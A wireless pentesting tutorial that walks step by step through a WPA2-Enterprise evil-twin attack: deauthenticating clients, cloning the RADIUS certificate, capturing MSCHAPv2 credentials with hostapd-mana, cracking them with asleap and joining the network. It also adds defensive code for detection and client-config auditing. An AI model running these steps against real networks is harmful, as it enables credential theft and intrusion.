WPA2-Enterprise Wireless Pentesting

There are multiple variations of WPA2-Enterprise. This post focuses on the tooling: using hostapd-mana and FreeRADIUS to create an evil twin network and then capture client credentials.

Step 1) Use a wireless card that supports monitor mode, then run the commands below:

sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up

Step 2) Run airodump-ng to enumerate nearby WiFi networks and note the following details for the target network.

sudo airodump-ng wlan0mon
  1. BSSID –
  2. Channel –
  3. ESSID –

Step 3) Stop the process, then run airodump-ng again, locked to the target channel and BSSID, to gather more specific information including the associated Stations. See “Troubleshooting Steps” if no Stations appear.

sudo airodump-ng wlan0mon -c <channel> --bssid <BSSID from Step 2>
  1. Station –

Step 4) Stop the process, then run airodump-ng again to write the captured traffic to a PCAP file

sudo airodump-ng -c <channel> --bssid <BSSID from Step 2> -w out wlan0mon

Step 5) In another terminal, deauthenticate a client so that it re-authenticates and the certificate the server presents during the EAP handshake is captured

sudo aireplay-ng -0 20 -b <BSSID from Step 2> -h <Station from Step 3> wlan0mon

Step 6) Stop airodump-ng and aireplay-ng, then inspect the PCAP file with Wireshark

sudo wireshark out-01.cap &

Step 7) In Wireshark, use the filter “tls.handshake.certificate”.

Zoom in to the Packet Details > TLSv1 Record Layer > Handshake Protocol > Certificates > Certificate

Right click “Certificate: <super long hex string>”, then click Export Packet Bytes and save it as certificate.der

Step 8) Use openssl to print the certificate details, paying particular attention to the “Issuer:” section. The abbreviations openssl prints map to the field names used in the FreeRADIUS config files:

openssl x509 -inform der -in certificate.der -text

C = countryName
ST = stateOrProvinceName
L = localityName
O = organizationName
emailAddress = emailAddress (printed in full, no abbreviation)
CN = commonName
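The fields above are the attributes of the X.509 Name structure that openssl renders after “Issuer:” and “Subject:”. As an added example (not code from the original post), here is a minimal DER encoder and parser for that structure, mapping the attribute OIDs to the same short names. The sample issuer values are constructed placeholders, not taken from any real certificate.

```python
# Added example (not from the original post): a minimal DER parser for the
# X.509 Name structure that openssl prints as "Issuer:" / "Subject:".
# The sample issuer below is constructed, not captured from any network.

# OID content bytes -> the short attribute names openssl prints.
OID_NAMES = {
    b"\x55\x04\x06": "C",    # 2.5.4.6  countryName
    b"\x55\x04\x08": "ST",   # 2.5.4.8  stateOrProvinceName
    b"\x55\x04\x07": "L",    # 2.5.4.7  localityName
    b"\x55\x04\x0a": "O",    # 2.5.4.10 organizationName
    b"\x55\x04\x03": "CN",   # 2.5.4.3  commonName
    b"\x2a\x86\x48\x86\xf7\x0d\x01\x09\x01": "emailAddress",  # PKCS#9 1.2.840.113549.1.9.1
}
NAME_OIDS = {v: k for k, v in OID_NAMES.items()}

SEQUENCE, SET, OID, UTF8STRING, IA5STRING = 0x30, 0x31, 0x06, 0x0C, 0x16


def _tlv(tag: int, content: bytes) -> bytes:
    """Encode one DER tag-length-value (lengths up to 65535 are plenty for a Name)."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    elif n < 0x100:
        length = b"\x81" + bytes([n])
    else:
        length = b"\x82" + n.to_bytes(2, "big")
    return bytes([tag]) + length + content


def encode_name(attrs: list[tuple[str, str]]) -> bytes:
    """Build a DER Name from (short-name, value) pairs, one RDN per attribute."""
    rdns = b""
    for short, value in attrs:
        string_tag = IA5STRING if short == "emailAddress" else UTF8STRING
        atv = _tlv(SEQUENCE, _tlv(OID, NAME_OIDS[short]) + _tlv(string_tag, value.encode()))
        rdns += _tlv(SET, atv)
    return _tlv(SEQUENCE, rdns)


def _read_tlv(buf: bytes, pos: int) -> tuple[int, bytes, int]:
    """Decode one TLV at pos; return (tag, content, position after it)."""
    tag = buf[pos]
    first = buf[pos + 1]
    if first < 0x80:
        length, pos = first, pos + 2
    else:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos + 2:pos + 2 + nbytes], "big")
        pos = pos + 2 + nbytes
    return tag, buf[pos:pos + length], pos + length


def parse_name(der: bytes) -> dict[str, str]:
    """Parse a DER Name into {short-name: value}; unknown OIDs are kept as hex."""
    tag, rdn_seq, _ = _read_tlv(der, 0)
    if tag != SEQUENCE:
        raise ValueError("Name must be a SEQUENCE")
    out = {}
    pos = 0
    while pos < len(rdn_seq):
        set_tag, rdn, pos = _read_tlv(rdn_seq, pos)
        if set_tag != SET:
            raise ValueError("RDN must be a SET")
        inner = 0
        while inner < len(rdn):
            _, atv, inner = _read_tlv(rdn, inner)
            _, oid, after_oid = _read_tlv(atv, 0)
            _, value, _ = _read_tlv(atv, after_oid)
            out[OID_NAMES.get(oid, oid.hex())] = value.decode()
    return out


def openssl_style(name: dict[str, str]) -> str:
    """Render in the one-line form openssl prints after 'Issuer:'."""
    return ", ".join(f"{k} = {v}" for k, v in name.items())


# Constructed sample issuer (placeholder values, not a real organisation).
SAMPLE_ISSUER = encode_name([
    ("C", "US"), ("ST", "Example State"), ("L", "Example City"),
    ("O", "Example Corp"), ("emailAddress", "ca@example.invalid"),
    ("CN", "Example Corp Root CA"),
])

if __name__ == "__main__":
    print(openssl_style(parse_name(SAMPLE_ISSUER)))
```

Note the design point this makes visible: every one of these attributes is a free-text string chosen by whoever generates the certificate, so two certificates from unrelated CAs can carry byte-identical Names. A client that decides trust by looking at these printed fields (rather than validating the signature chain against a pinned CA) cannot tell the real RADIUS server from a copy of its Subject and Issuer.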

Step 9) Change to root

sudo -s

Step 10) Modify the FreeRADIUS CA certificate config

nano /etc/freeradius/3.0/certs/ca.cnf
  1. Search for, or scroll down to, the [certificate_authority] section
  2. Set countryName, stateOrProvinceName, localityName, organizationName, emailAddress and commonName to the values obtained in Step 8
  3. Note that commonName should be enclosed in double quotes (" ")

Step 11) Modify the FreeRADIUS server certificate config

nano /etc/freeradius/3.0/certs/server.cnf
  1. Search for, or scroll down to, the [server] section
  2. Set countryName, stateOrProvinceName, localityName, organizationName, emailAddress and commonName to the values obtained in Step 8
  3. Note that commonName should be enclosed in double quotes (" ")

Step 12) Generate the certificates by changing to the FreeRADIUS certs directory and running make

cd /etc/freeradius/3.0/certs
make

Step 13) Create a hostapd-mana EAP user file with the content shown after the nano command:

nano /etc/hostapd-mana/mana.eap_user

*    PEAP,TTLS,TLS,FAST
"t"  TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2  "pass"  [2]

Step 14) Create a hostapd-mana config file with the content shown after the nano command:

nano /etc/hostapd-mana/mana.conf

#Wireless information
ssid=<ESSID from Step 2>
interface=wlan0
driver=nl80211
channel=<channel from Step 2>
hw_mode=g

#EAP information
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user

#Certificate information
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key

#Setting nonsensical password to the private key
#(must match the output_password set in server.cnf; the default in that file is "whatever")
private_key_password=12345678
dh_file=/etc/freeradius/3.0/certs/dh

#Setting some WPA details
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP

#Setting mana config
mana_wpe=1
mana_credout=/tmp/hostapd.credout
mana_eapsuccess=1
mana_eaptls=1

Step 15) Start hostapd-mana

hostapd-mana /etc/hostapd-mana/mana.conf

Step 16) If required, deauthenticate clients from the legitimate network so that they reconnect to your rogue network

sudo aireplay-ng -0 5 -b <BSSID from Step 2> wlan0mon
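Both Step 15 (a second AP beaconing the target ESSID) and the deauthentication bursts of Steps 5 and 16 are visible to anyone monitoring the air, and that is how a wireless IDS catches this. As an added example (not code from the original post), here is a small detector over a constructed list of management-frame records: it flags a beacon carrying a protected ESSID from a BSSID that is not on the allowlist, and a burst of deauthentication frames within a sliding window. The allowlist, MAC addresses and frames are all constructed; in practice the records would come from a monitor-mode capture.

```python
# Added example (not from the original post): wireless-IDS style checks for the two
# observable signals of an evil twin attack. All data below is constructed.
from collections import defaultdict

# Constructed allowlist: the protected ESSID and its legitimate BSSIDs.
AUTHORIZED = {"CorpWiFi": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}}

DEAUTH_THRESHOLD = 10  # deauth frames from one BSSID ...
DEAUTH_WINDOW = 5.0    # ... within this many seconds is a burst

# Constructed capture: (timestamp, subtype, transmitter/BSSID, essid, channel).
# Spoofed deauths carry the legitimate AP's address, so the burst appears to come from it.
FRAMES = [
    (0.0, "beacon", "aa:bb:cc:00:00:01", "CorpWiFi", 6),
    (0.1, "beacon", "aa:bb:cc:00:00:02", "CorpWiFi", 11),
    (0.2, "beacon", "de:ad:be:ef:00:01", "CorpWiFi", 6),   # same ESSID, unknown BSSID
    (0.3, "beacon", "12:34:56:78:9a:bc", "GuestNet", 1),   # not a protected ESSID
] + [(1.0 + i * 0.05, "deauth", "aa:bb:cc:00:00:01", None, 6) for i in range(20)]


def find_rogue_aps(frames):
    """Beacons claiming a protected ESSID from a BSSID outside the allowlist."""
    rogues = set()
    for _, subtype, bssid, essid, channel in frames:
        if subtype == "beacon" and essid in AUTHORIZED and bssid not in AUTHORIZED[essid]:
            rogues.add((essid, bssid, channel))
    return rogues


def find_deauth_bursts(frames, threshold=DEAUTH_THRESHOLD, window=DEAUTH_WINDOW):
    """{bssid: peak count} for BSSIDs with >= threshold deauths inside any window."""
    times = defaultdict(list)
    for ts, subtype, bssid, _, _ in frames:
        if subtype == "deauth":
            times[bssid].append(ts)
    bursts = {}
    for bssid, stamps in times.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window's left edge
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            bursts[bssid] = peak
    return bursts


def alerts(frames):
    """Human-readable alert lines for both detectors."""
    out = [f"ROGUE_AP essid={e} bssid={b} channel={c}" for e, b, c in sorted(find_rogue_aps(frames))]
    out += [f"DEAUTH_BURST bssid={b} frames_in_window={n}"
            for b, n in sorted(find_deauth_bursts(frames).items())]
    return out


if __name__ == "__main__":
    for line in alerts(FRAMES):
        print(line)
```

The BSSID allowlist is the part that needs maintaining: a rogue AP copies the ESSID, channel and cipher suite from Step 2 verbatim, so the transmitter address is the one attribute the evil twin config above cannot clone without also impersonating a specific AP. Management Frame Protection (802.11w) on the legitimate network removes the deauthentication lever entirely.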

Step 17) Inspect the hostapd-mana output: it should show the domain\username together with the captured MSCHAPv2 challenge/response in asleap, JtR and hashcat formats.

For simplicity, open a new terminal and use asleap to crack the passwords, since hostapd-mana prints the complete command to run

sudo asleap -C <first portion> -R <second portion> -W /usr/share/john/password.lst

Step 18) Create a wpa_supplicant config file to be used in step 19:

nano wpa2enterprise.conf

network={
    ssid="INPUT_ESSID_FROM_STEP_2"
    scan_ssid=1
    key_mgmt=WPA-EAP
    identity="domain\username_FROM_STEP_17"
    password="password_FROM_STEP_17"
    eap=PEAP
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
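The supplicant profile above deliberately sets no ca_cert and no server name match, so it accepts whatever certificate the access point presents. Those same omissions are what make an ordinary corporate client fall for the evil twin from Step 15. As an added example (not code from the original post), here is a lint check that parses a wpa_supplicant network block and reports the missing settings; the weak profile is a placeholder-valued copy of the one above, and the hardened profile, the ca_cert path and the domain_suffix_match value are constructed placeholders.

```python
# Added example (not from the original post): lint a wpa_supplicant network={...}
# block for the settings that let a client reject a rogue RADIUS server.
# The ca_cert, domain_suffix_match, subject_match and altsubject_match options are
# real wpa_supplicant options; all profile values below are constructed placeholders.
import re

CERT_TRUST_KEYS = {"ca_cert", "ca_path"}
IDENTITY_MATCH_KEYS = {"domain_suffix_match", "domain_match", "subject_match", "altsubject_match"}

# Constructed: the profile from Step 18 with placeholder values.
WEAK_PROFILE = """network={
    ssid="CorpWiFi"
    scan_ssid=1
    key_mgmt=WPA-EAP
    identity="CORP\\jdoe"
    password="placeholder"
    eap=PEAP
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
"""

# Constructed: the same profile pinned to the real RADIUS CA and server name (placeholder values).
HARDENED_PROFILE = """network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="CORP\\jdoe"
    password="placeholder"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
"""


def parse_network_block(text):
    """Extract key=value pairs from the first network={...} block (surrounding quotes stripped)."""
    m = re.search(r"network=\{(.*?)\}", text, re.S)
    if not m:
        raise ValueError("no network={...} block found")
    settings = {}
    for line in m.group(1).splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)       # split on the first '=' only (phase1="peaplabel=0")
        settings[key.strip()] = value.strip().strip('"')
    return settings


def lint_eap_profile(settings):
    """Findings explaining why a rogue AP with a cloned certificate would be accepted."""
    findings = []
    if settings.get("key_mgmt") != "WPA-EAP":
        return ["not an 802.1X/EAP profile; nothing to check"]
    if not (CERT_TRUST_KEYS & settings.keys()):
        findings.append("no ca_cert/ca_path: any server certificate is trusted, "
                        "including one with copied Subject and Issuer fields")
    if not (IDENTITY_MATCH_KEYS & settings.keys()):
        findings.append("no domain_suffix_match/subject_match: any certificate issued by the "
                        "trusted CA for any name would be accepted")
    if settings.get("phase2", "").lower() == "auth=mschapv2" and findings:
        findings.append("inner MSCHAPv2 exchange would be exposed to the rogue server")
    return findings


if __name__ == "__main__":
    for name, profile in (("weak", WEAK_PROFILE), ("hardened", HARDENED_PROFILE)):
        print(name, lint_eap_profile(parse_network_block(profile)) or ["ok"])
```

The check is deliberately strict about both settings: ca_cert alone still accepts any server certificate the pinned CA has issued, and a name match alone is meaningless without a CA to anchor it. Managed clients (Windows NPS profiles, Android, iOS) expose the same two controls under different names, and the audit question is the same.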

Step 19) Connect to the WPA2-Enterprise network using wpa_supplicant

sudo wpa_supplicant -B -i wlan0 -c wpa2enterprise.conf

Step 20) Obtain an IP address from the wireless router

sudo dhclient -v wlan0

Step 21) Perform further pivoting / attacks, then disconnect from the network

sudo killall wpa_supplicant
